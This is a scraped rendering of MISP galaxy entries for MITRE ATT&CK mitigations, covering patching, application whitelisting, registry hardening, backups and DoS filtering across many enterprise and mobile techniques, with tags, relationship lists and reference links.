Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software components targeted for privilege escalation.

The tag is: **misp-galaxy:mitre-course-of-action="Exploitation for Privilege Escalation Mitigation - T1068"**

Exploitation for Privilege Escalation Mitigation - T1068 has relationships with:

- mitigates: **misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068"** with estimative-language:likelihood-probability="almost-certain"

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Bypass User Account Control Mitigation - T1088

Remove users from the local administrator group on systems. Although UAC bypass techniques exist, it is still prudent to use the highest enforcement level for UAC when possible and mitigate
bypass opportunities that exist with techniques such as [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).

Check for common UAC bypass weaknesses on Windows systems to be aware of the risk posture and address issues where appropriate. (Citation: Github UACMe)

The tag is: `misp-galaxy:mitre-course-of-action="Bypass User Account Control Mitigation - T1088"`

Bypass User Account Control Mitigation - T1088 has relationships with:


`Table 3902. Table References`

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<td><a href="https://github.com/hfiref0x/UACME">https://github.com/hfiref0x/UACME</a></td>
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**Exploitation for Defense Evasion Mitigation - T1211**

Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software targeted for defense evasion.

The tag is: `misp-galaxy:mitre-course-of-action="Exploitation for Defense Evasion Mitigation - T1211"`

Exploitation for Defense Evasion Mitigation - T1211 has relationships with:


`Table 3903. Table References`

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Extra Window Memory Injection Mitigation - T1181

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

Although EWM injection may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Extra Window Memory Injection Mitigation - T1181"

Extra Window Memory Injection Mitigation - T1181 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Extra Window Memory Injection - T1181" with estimative-language:likelihood-probability="almost-certain"

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Exploitation for Credential Access Mitigation - T1212

Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched
vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software targeted for defense evasion.

The tag is: *misp-galaxy:mitre-course-of-action="Exploitation for Credential Access Mitigation - T1212"

Exploitation for Credential Access Mitigation - T1212 has relationships with:


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<td><a href="https://en.wikipedia.org/wiki/Control-flow_integrity">https://en.wikipedia.org/wiki/Control-flow_integrity</a></td>
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**Component Object Model Hijacking Mitigation - T1122**

Direct mitigation of this technique may not be recommended for a particular environment since COM objects are a legitimate part of the operating system and installed software. Blocking COM object changes may have unforeseen side effects to legitimate functionality.

Instead, identify and block potentially malicious software that may execute, or be executed by, this technique using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: *misp-galaxy:mitre-course-of-action="Component Object Model Hijacking Mitigation - T1122"

Component Object Model Hijacking Mitigation - T1122 has relationships with:

### Data from Information Repositories Mitigation - T1213

To mitigate adversary access to information repositories for collection:

- Develop and publish policies that define acceptable information to be stored
- Appropriate implementation of access control mechanisms that include both authentication and appropriate authorization
- Enforce the principle of least-privilege
- Periodic privilege review of accounts
- Mitigate access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) that may be used to access repositories

The tag is: `misp-galaxy:mitre-course-of-action="Data from Information Repositories Mitigation - T1213"`

Data from Information Repositories Mitigation - T1213 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213"` with `estimative-language:likelihood-probability="almost-certain"`

### Kernel Modules and Extensions Mitigation - T1215

Common tools for detecting Linux rootkits include: rkhunter (Citation: SourceForge rkhunter), chrootkit (Citation: Chkrootkit Main), although rootkits may be designed to evade certain detection tools.

LKM and Kernel extensions require root level permissions to be installed. Limit access to the root account and prevent users from loading kernel modules and extensions through proper privilege...
separation and limiting Privilege Escalation opportunities.

Application whitelisting and software restriction tools, such as SELinux, can also aide in restricting kernel module loading. (Citation: Kernel.org Restrict Kernel Module)

The tag is: `misp-galaxy:mitre-course-of-action="Kernel Modules and Extensions Mitigation - T1215"`

Kernel Modules and Extensions Mitigation - T1215 has relationships with:


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<td><a href="https://attack.mitre.org/mitigations/T1215">https://attack.mitre.org/mitigations/T1215</a></td>
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<td><a href="http://rkhunter.sourceforge.net">http://rkhunter.sourceforge.net</a></td>
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<td><a href="http://www.chkrootkit.org/">http://www.chkrootkit.org/</a></td>
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<td><a href="https://patchwork.kernel.org/patch/8754821/">https://patchwork.kernel.org/patch/8754821/</a></td>
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</table>

Network Share Connection Removal Mitigation - T1126

Follow best practices for mitigation of activity related to establishing [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).

Identify unnecessary system utilities or potentially malicious software that may be used to leverage network shares, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: `misp-galaxy:mitre-course-of-action="Network Share Connection Removal Mitigation - T1126"`

Network Share Connection Removal Mitigation - T1126 has relationships with:


- mitigates: `misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005"` with estimative-language:likelihood-probability="almost-certain"

### Table 3909. Table References

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</table>
Signed Script Proxy Execution Mitigation - T1216

Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.

The tag is: misc-galaxy:misr-course-of-action="Signed Script Proxy Execution Mitigation - T1216"

Signed Script Proxy Execution Mitigation - T1216 has relationships with:


Table 3910. Table References

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</table>

Execution through Module Load Mitigation - T1129

Directly mitigating module loads and API calls related to module loads will likely have unintended side effects, such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying and correlated subsequent behavior to determine if it is the result of malicious activity.

The tag is: misc-galaxy:misr-course-of-action="Execution through Module Load Mitigation - T1129"

Execution through Module Load Mitigation - T1129 has relationships with:


Table 3911. Table References

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</table>

Distributed Component Object Model Mitigation - T1175

Modify Registry settings (directly or using Dcomcnfg.exe) in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID{AppID_GUID}</code> associated with
the process-wide security of individual COM applications. (Citation: Microsoft Process Wide Com Keys)

Modify Registry settings (directly or using Dcomcnfg.exe) in 
<code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole</code> associated with system-wide security defaults for all COM applications that do no set their own process-wide security. (Citation: Microsoft System Wide Com Keys) (Citation: Microsoft COM ACL)

Consider disabling DCOM through Dcomcnfg.exe. (Citation: Microsoft Disable DCOM)

Enable Windows firewall, which prevents DCOM instantiation by default.

Ensure all COM alerts and Protected View are enabled. (Citation: Microsoft Protected View)

The tag is: <code>misp-galaxy:mitre-course-of-action="Distributed Component Object Model Mitigation - T1175"</code>

Distributed Component Object Model Mitigation - T1175 has relationships with:


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### Man in the Browser Mitigation - T1185

Since browser pivoting requires a high integrity process to launch from, restricting user permissions and addressing Privilege Escalation and [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) opportunities can limit the exposure to this technique.

Close all browser sessions regularly and when they are no longer needed.

The tag is: <code>misp-galaxy:mitre-course-of-action="Man in the Browser Mitigation - T1185"</code>

Man in the Browser Mitigation - T1185 has relationships with:

- mitigates: <code>misp-galaxy:mitre-attack-pattern="Man in the Browser - T1185" with estimative-</code>
Hidden Files and Directories Mitigation - T1158

Mitigation of this technique may be difficult and unadvised due to the the legitimate use of hidden files and directories.

The tag is: `misp-galaxy:mitre-course-of-action="Hidden Files and Directories Mitigation - T1158"`

Hidden Files and Directories Mitigation - T1158 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1158"` with `estimative-language:likelihood-probability="almost-certain"`

Data Encrypted for Impact Mitigation - T1486

Consider implementing IT disaster recovery plans that contain procedures for regularly taking and testing data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP)

In some cases, the means to decrypt files affected by a ransomware campaign is released to the public. Research trusted sources for public releases of decryptor tools/keys to reverse the effects of ransomware.

Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)

The tag is: `misp-galaxy:mitre-course-of-action="Data Encrypted for Impact Mitigation - T1486"`

Data Encrypted for Impact Mitigation - T1486 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486"` with `estimative-language:likelihood-probability="almost-certain"`
Network Denial of Service Mitigation - T1498

When flood volumes exceed the capacity of the network connection being targeted, it is typically necessary to intercept the incoming traffic upstream to filter out the attack traffic from the legitimate traffic. Such defenses can be provided by the hosting Internet Service Provider (ISP) or by a 3rd party such as a Content Delivery Network (CDN) or providers specializing in DoS mitigations.(Citation: CERT-EU DDoS March 2017)

Depending on flood volume, on-premises filtering may be possible by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.(Citation: CERT-EU DDoS March 2017)

As immediate response may require rapid engagement of 3rd parties, analyze the risk associated to critical resources being affected by Network DoS attacks and create a disaster recovery plan/business continuity plan to respond to incidents.(Citation: CERT-EU DDoS March 2017)

The tag is: misp-galaxy:mitre-course-of-action="Network Denial of Service Mitigation - T1498"

Network Denial of Service Mitigation - T1498 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="almost-certain"

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Endpoint Denial of Service Mitigation - T1499

Leverage services provided by Content Delivery Networks (CDN) or providers specializing in DoS mitigations to filter traffic upstream from services.(Citation: CERT-EU DDoS March 2017) Filter boundary traffic by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport. To defend against SYN floods, enable SYN Cookies.
The tag is: misp-galaxy:mitre-course-of-action="Endpoint Denial of Service Mitigation - T1499"

Endpoint Denial of Service Mitigation - T1499 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Endpoint Denial of Service - T1499" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="OS Exhaustion Flood - T1499.001" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Application Exhaustion Flood - T1499.003" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Application or System Exploitation - T1499.004" with estimative-language:likelihood-probability="almost-certain"

**Exploit Public-Facing Application Mitigation - T1190**

Application isolation and least privilege help lesson the impact of an exploit. Application isolation will limit what other processes and system features the exploited target can access, and least privilege for service accounts will limit what permissions the exploited process gets on the rest of the system. Web Application Firewalls may be used to limit exposure of applications.

Segment externally facing servers and services from the rest of the network with a DMZ or on separate hosting infrastructure.

Use secure coding best practices when designing custom software that is meant for deployment to externally facing systems. Avoid issues documented by OWASP, CWE, and other software weakness identification efforts.

Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and through public disclosure.

The tag is: misp-galaxy:mitre-course-of-action="Exploit Public-Facing Application Mitigation - T1190"

Exploit Public-Facing Application Mitigation - T1190 has relationships with:

Two-Factor Authentication Interception Mitigation - T1111

Remove smart cards when not in use. Protect devices and services used to transmit and receive out-of-band codes.

Identify and block potentially malicious software that may be used to intercept 2FA credentials on a system by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: *misp-galaxy:mitre-course-of-action=*"Two-Factor Authentication Interception Mitigation - T1111"

Two-Factor Authentication Interception Mitigation - T1111 has relationships with:


Table 3919. Table References

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.bash_profile and .bashrc Mitigation - T1156

Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.

The tag is: *misp-galaxy:mitre-course-of-action=*".bash_profile and .bashrc Mitigation - T1156"

*bash_profile and .bashrc Mitigation - T1156 has relationships with:


Table 3920. Table References
System Owner/User Discovery Mitigation - T1033

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system users, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Owner/User Discovery Mitigation - T1033"

Application Window Discovery Mitigation - T1010

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Application Window Discovery Mitigation - T1010"
Behavior Prevention on Endpoint - M1040

Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.

The tag is: misp-galaxy:mitre-course-of-action="Behavior Prevention on Endpoint - M1040"

Behavior Prevention on Endpoint - M1040 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1173" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Thread Local Storage - T1055.005" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Ptrace System Calls - T1055.008" with estimative-language:likelihood-probability="almost-certain"
Winlogon Helper DLL Mitigation - T1004

Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.

Identify and block potentially malicious software that may be executed through the Winlogon helper process by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

The tag is: `misp-galaxy:mitre-course-of-action="Winlogon Helper DLL Mitigation - T1004"`

Winlogon Helper DLL Mitigation - T1004 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1004"` with estimative-language:likelihood-probability="almost-certain"

Compile After Delivery Mitigation - T1500

This type of technique cannot be easily mitigated with preventive controls or patched since it is based on the abuse of operating system design features. For example, blocking all file compilation may have unintended side effects, such as preventing legitimate OS frameworks and code development mechanisms from operating properly. Consider removing compilers if not needed, otherwise efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.
Identify unnecessary system utilities or potentially malicious software that may be used to decrypt, deobfuscate, decode, and compile files or information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Compile After Delivery Mitigation - T1500"

Compile After Delivery Mitigation - T1500 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1500" with estimative-language:likelihood-probability="almost-certain"

**Table 3925. Table References**

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**Use Recent OS Version - M1006**

New mobile operating system versions bring not only patches against discovered vulnerabilities but also often bring security architecture improvements that provide resilience against potential vulnerabilities or weaknesses that have not yet been discovered. They may also bring improvements that block use of observed adversary techniques.

The tag is: misp-galaxy:mitre-course-of-action="Use Recent OS Version - M1006"

Use Recent OS Version - M1006 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Exploit via Radio Interfaces - T1477" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Process Discovery - T1424" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Carrier Billing Fraud - T1448" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1456" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Lockscreen Bypass - T1461" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Exploit TEE Vulnerability - T1405" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Modify Cached Executable Code - T1403" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Abuse Accessibility Features - T1453" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Exploit via Charging Station or PC - T1458" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Attack PC via USB Connection - T1427" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Clipboard Modification - T1510" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Capture Clipboard Data - T1414" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Compromise Application Executable - T1577" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Keychain - T1579" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="URI Hijacking - T1416" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Geofencing - T1581" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/mitigations/M1006">https://attack.mitre.org/mitigations/M1006</a></td>
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**System Service Discovery Mitigation - T1007**

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about services, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: *misp-galaxy:mitre-course-of-action="System Service Discovery Mitigation - T1007"*

System Service Discovery Mitigation - T1007 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 3927. Table References

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Taint Shared Content Mitigation - T1080

Protect shared folders by minimizing users who have write access. Use utilities that detect or mitigate common features used in exploitation, such as the Microsoft Enhanced Mitigation Experience Toolkit (EMET).

Reduce potential lateral movement risk by using web-based document management and collaboration services that do not use network file and directory sharing.

Identify potentially malicious software that may be used to taint content or may result from it and audit and/or block the unknown programs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Taint Shared Content Mitigation - T1080"

Taint Shared Content Mitigation - T1080 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"

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Security Support Provider Mitigation - T1101

Windows 8.1, Windows Server 2012 R2, and later versions may make LSA run as a Protected Process Light (PPL) by setting the Registry key <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL</code>, which requires all SSP DLLs to be signed by Microsoft. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)

The tag is: misp-galaxy:mitre-course-of-action="Security Support Provider Mitigation - T1101"

Security Support Provider Mitigation - T1101 has relationships with:

Peripheral Device Discovery Mitigation - T1120

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about peripheral devices, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Peripheral Device Discovery Mitigation - T1120"

Peripheral Device Discovery Mitigation - T1120 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"

Password Policy Discovery Mitigation - T1201

Mitigating discovery of password policies is not advised since the information is required to be known by systems and users of a network. Ensure password policies are such that they mitigate brute force attacks yet will not give an adversary an information advantage because the policies are too light. Active Directory is a common way to set and enforce password policies throughout an enterprise network. (Citation: Microsoft Password Complexity)

The tag is: misp-galaxy:mitre-course-of-action="Password Policy Discovery Mitigation - T1201"
Password Policy Discovery Mitigation - T1201 has relationships with:


### Table 3931. Table References

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<td><a href="https://attack.mitre.org/mitigations/T1201">https://attack.mitre.org/mitigations/T1201</a></td>
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</table>

Install Root Certificate Mitigation - T1130

HTTP Public Key Pinning (HPKP) is one method to mitigate potential man-in-the-middle situations where an adversary uses a mis-issued or fraudulent certificate to intercept encrypted communications by enforcing use of an expected certificate. (Citation: Wikipedia HPKP)

Windows Group Policy can be used to manage root certificates and the <code>Flags</code> value of <code>HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\ProtectedRoots</code> can be set to 1 to prevent non-administrator users from making further root installations into their own HKCU certificate store. (Citation: SpectorOps Code Signing Dec 2017)

The tag is: <code>misp-galaxy:mitre-course-of-action="Install Root Certificate Mitigation - T1130"</code>

Install Root Certificate Mitigation - T1130 has relationships with:


### Table 3932. Table References

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<td><a href="https://en.wikipedia.org/wiki/HTTP_Public_Key_Pinning">https://en.wikipedia.org/wiki/HTTP_Public_Key_Pinning</a></td>
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<td><a href="https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f9857fc6ec">https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f9857fc6ec</a></td>
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</table>

Modify Existing Service Mitigation - T1031

Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Toolkits like the PowerSploit framework contain the PowerUp modules that can be used to explore systems for Privilege Escalation weaknesses. (Citation: Powersploit)

Identify and block potentially malicious software that may be executed through service abuse by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown
Remote File Copy Mitigation - T1105

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Remote File Copy Mitigation - T1105"

Remote File Copy Mitigation - T1105 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Graphical User Interface Mitigation - T1061

Prevent adversaries from gaining access to credentials through Credential Access that can be used to log into remote desktop sessions on systems.
Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to log into remote interactive sessions, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) and Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: `misp-galaxy:mitre-course-of-action="Graphical User Interface Mitigation - T1061"`

Graphical User Interface Mitigation - T1061 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Graphical User Interface - T1061"` with estimative-language:likelihood-probability="almost-certain"

**Table 3935. Table References**

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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**Application Deployment Software Mitigation - T1017**

Grant access to application deployment systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multifactor authentication. Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network. Patch deployment systems regularly to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).

If the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.

The tag is: `misp-galaxy:mitre-course-of-action="Application Deployment Software Mitigation - T1017"`

Application Deployment Software Mitigation - T1017 has relationships with:


**Table 3936. Table References**
Credentials in Files Mitigation - T1081

Establish an organizational policy that prohibits password storage in files. Ensure that developers and system administrators are aware of the risk associated with having plaintext passwords in software configuration files that may be left on endpoint systems or servers. Preemptively search for files containing passwords and remove when found. Restrict file shares to specific directories with access only to necessary users. Remove vulnerable Group Policy Preferences. (Citation: Microsoft MS14-025)

The tag is: misp-galaxy:mitre-course-of-action="Credentials in Files Mitigation - T1081"

Credentials in Files Mitigation - T1081 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Remote System Discovery Mitigation - T1018

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information on remotely available systems, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

